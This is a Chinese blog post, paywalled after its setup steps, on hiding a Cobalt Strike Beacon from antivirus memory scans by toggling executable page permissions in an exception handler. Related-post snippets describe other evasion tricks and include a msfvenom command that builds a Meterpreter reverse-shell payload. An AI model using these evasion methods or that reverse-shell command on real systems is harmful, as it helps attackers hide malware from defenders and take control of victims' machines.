免杀-绕过内存扫描

已于 2022-11-16 22:24:18 修改
阅读量2k 收藏 4
点赞数 1
分类专栏: 免杀 文章标签: c++ 开发语言
于 2022-11-16 22:22:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44747030/article/details/127894742
版权
本文介绍了如何利用Detours库在Windows环境下实现免杀Beacon的技术,通过修改内存页权限,在异常处理时瞬间恢复可执行属性,从而避开杀毒软件的内存扫描。详细步骤包括下载Detours库,编译x64版本,注入代码并设置异常处理程序,以及在执行过程中动态调整内存页权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

免杀-绕过内存扫描 复现

参考文章:https://xz.aliyun.com/t/9399

起因是在群里看到大佬们在聊这个,就上网搜了一份教程,我本地没有卡巴斯基,所以随便复现一下,做个记录,当个笔记。

​ 内存扫描是耗时耗力不管是卡巴还是其他杀软,一般来说都是扫描进程中一些高危的区域比如带有可执行属性的内存区域,既然他扫描带有X(可执行)属性的内存区域那么只要我们去除X属性,那自然就不会被扫也就不会被发现,但问题是去除X属性后Beacon也就跑不起来,但是不用怕我们知道Windows进程触发异常时我们可以对它处理,而此时我们可以在一瞬间恢复内存X属性让它跑起来然后等它再次进入sleep时去除X属性隐藏起来

复现

下载一份detours库,然后用vs编译成x64版本

https://github.com/microsoft/Detours.git

找到vs,使用x64编译以这个库

在这里插入图片描述

进入到src目录使用namke编译x64版本

在这里插入图片描述

将编译出来的如下三个文件 放到创建好的c++项目中

最低0.47元/天 解锁文章
EDR查原理曝光及绕过
摔不死的笨鸟的博客
09-22 1347
为了保护系统的安全和稳定性,从Windows 64位起,Windows机器有两种不同的运行模式:用户模式和内核模式,用户模式即我们平时使用各种应用程序时所处的交互模式,应用可以访问CPU和内存等资源,维持自身的正常运转。Meterpreter绕过了磁盘上基于签名的检测和使用系统调用的Shellcode检测,但在运行不到一分钟后又被报毒,这是一个基于行为的检测,由额外的DLL文件触发,通过普通 Win32 API 和反射 DLL 注入技术加载。从我目前的知识和观点来看,对此问题的非常简单的回答是——不!
逃避内存扫描
01-20
逃避内存扫描,在ntdll末尾2kb插入shellcode的技术....
VOIDMAW:一种可用于绕过内存扫描器的新技术
网络研究观
10-23 1092
VOIDMAW 代表了规避技术的重大进步。
内存技术分析:原理、方法与实战应用
最新发布
syg6921008的博客
04-07 1077
内存代表了攻防技术的集大成者,它将加密算法、内核原理、操作系统行为、线程模型、模块结构、执行逻辑伪装融为一体,形成真正意义上的多维立体隐匿技术。这是对现代EDR架构的深度挑战,也是对安全工程师知识体系的极限拷问。未来,随着硬件安全模块、行为追踪引擎和 AI 模型加速部署,内存将成为持久控制、无文件攻击与多态演化的必备核心技术之一。“能被看见的攻击,才值得被防御;真正的,从未暴露。愿每一位隐匿于内存深处的研究者,都能以极致之术,行无痕之道。
内存--
hackzkaq的博客
12-02 1121
Edr会扫描程序的内存空间,检测是否存在恶意软件,这种检测恶意软件的方式,应该和静态检测没什么区别,只不过一个扫描的对象是硬盘,一个是内存,应该都是基于特征码来检测的,为了绕过这种扫描我们可以对内存中的beacon进行加密,但这样的话就会出现问题,因为beacon被加密后是无法正常的运行的,因为代码被加密了。我们提到过自己是不可以加密自己的,但是Ekko项目实现了自己加密自己的内存,这对对抗内存扫描很有帮助。等待某个对象的状态,如果状态为已通知就往下执行,或者等待超时也会往下执行,也可以设置一直等待。
Sleep加密绕过内存
r250414958的博客
03-26 598
Sleep加密绕过内存前言参考: 前言 这个思路不错,可以尝试一下 参考: Shellcode有问题需要自己改 https://github.com/SolomonSklash/SleepyCrypt 提供的思路可以,根据自己的需求更改 https://bbs.pediy.com/thread-267619.htm ...
工具分享 | DuckMemoryScan - 一款检测绝大部分内存马的工具,护网蓝队必备。
IT软件汇
09-14 404
工具分享 | DuckMemoryScan - 一款检测绝大部分内存马的工具,护网蓝队必备。
实战诺顿shellcode载入内存
sherlockmj的博客
03-04 1115
生成shellcode msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.241.132 lport=8080 -e -p:指定payload; -e:指定编码方式; -i:编译次数; -b:去除指定代码,一般都是空代码或者错误代码; lhost:指定本机监听端口; -f:指定生成格式; -o:指定生成输出位置; shellcode执行盒执行 https://github.com/clinicallyinane/shell
源码-花指令
08-21
3. **技术的应用**:不仅仅局限于花指令,还包括其他多种技术,如API混淆、壳代码(Shellcode)隐藏、虚拟机绕过等。这些技术组合使用,可以构建更复杂的策略。例如,使用API混淆技术可以改变函数调用的...
2022-2024常用经典技术汇总!
03-27
4. **内存**:不在硬盘上留下痕迹,而是在内存中执行,这可以避被常规的文件扫描工具发现。 5. **行为隐藏**:模拟正常系统或用户行为,使得恶意活动在监控中难以区分,如模仿常见网络通信模式、使用合法API...
DuckMemoryScan:检测绝大部分所谓的内存
03-04
DuckMemoryScan 一个简单寻找包括不限于iis劫持,无文件木马,shellcode后门的工具,由huoji花了1天编写,编写时间2021-02-24 !!!!!!!!!!!!!!!!!!!!!!!!! ,不要执行32位编译!!! !!!本工具不能代替毒软件!!! 运行截图 功能列表 HWBP hook检测检测线程中所有疑似被hwbp隐形链接 内存shellcode检测(metasploit,Cobaltstrike完全检测) 可疑进展检测(主要针对有逃避性质的进展[如过期签名与多部分细分段]) 无文件落地木马检测(检测所有已知内存加载木马) 简易rootkit检测(检测证书过期/拦截复制/证书无效的驱动) 检测异常模块,检测绝大部分如“ iis劫持”的后门(2021年2月26日添加) 木马检测原理: 所有所谓的内存后门大部分基于“ VirtualAlloc”函
c语言内存扫描
This is bill的专属博客
07-14 2700
曾经很早的时候就学习过
简单介绍
qq_38675102的博客
01-05 2996
简单介绍
前置课——Windows编程】十九、内存管理—堆,Windows如何管理内存数据?堆内存相关API
m0_62783065的博客
12-18 514
前置课——Windows编程】十九、内存管理—堆,Windows如何管理内存数据?堆内存相关API
支持64位系统的XOR加密后内存加载PE绕过毒软件
liujiayu2的专栏
09-14 1225
http://bbs.pediy.com/showthread.php?t=203910 绝对自动支持32、64位的内存加载源码 无聊逛看雪时,看到了这个。 然后到github上找到了源。就是这里:https://github.com/fancycode/MemoryModule 结合我几年前写的一个利用方法:https://github.com/eric21/MemPE 使
Python反序列化上线CS:两次编码绕过
Miracle_ze的博客
08-21 2311
如果在测试中出现crypto问题,是因为在使用python是经常会用到import一个第三方库,但是有时候会提示某个模块不存在,如Crypto其实是因为Python3里面这个模块的名字变了。这里的编码是我们上传了服务器已经编码过一次的内容进行了的反序列化,对反序列化后的内再次base64编码。编码base64编码 =》aes 加密 =》base64编码 加密1次 解密1次。此时加密后输入的加密格式是base64格式,为此要解密前需要先base64解密再进行AES解密。在文件内容加入反序列化结果。
内存保护机制及绕过方法——利用Ret2Libc绕过DEP之ZwSetInformationProcess函数
weixin_30911451的博客
05-11 520
1. DEP内存保护机制 1.1 DEP工作原理 分析缓冲区溢出攻击,其根源在于现代计算机对数据和代码没有明确区分这一先天缺陷,就目前来看重新去设计计算机体系结构基本上是不可能的,我们只能靠向前兼容的修补来减少溢出带来的损害,数据执行保护DEP就是用来弥补计算机对数据和代码混淆这一天然缺陷的。 DEP的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时...
CS之信手拈来
Gamma_lab的博客
08-06 1762
前言 最近搞了一个cs的东西出来,主流的毒软件,某绒,某0,windows defender都轻松过掉,但是把在测试卡巴全方位版时,成功上线之后就死掉了,我怀疑不是内存,如果是内存,我把shellcode写进去内存的时候,就应该爆肚了,我觉得还是cs上线之后的行为触发卡巴的毒机制,就哦豁了。 然后我就在github上面找点项目来参考一下,果然找到一个很不错的项目,这里分享给大家。 实践 项目地址: https://github.com/ORCA666/EVA2 根据作者描述,这个项目
MYCCL:内存定位特征码的必备工具
MYCCL就是这类技术中的一种,它主要是用来对恶意软件进行修改,以绕过安全检测。 ### MYCCL工具的核心功能 1. **内存特征码定位**: MYCCL工具的核心功能是能够在内存中定位恶意软件的特征码。特征码是用于恶意软件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值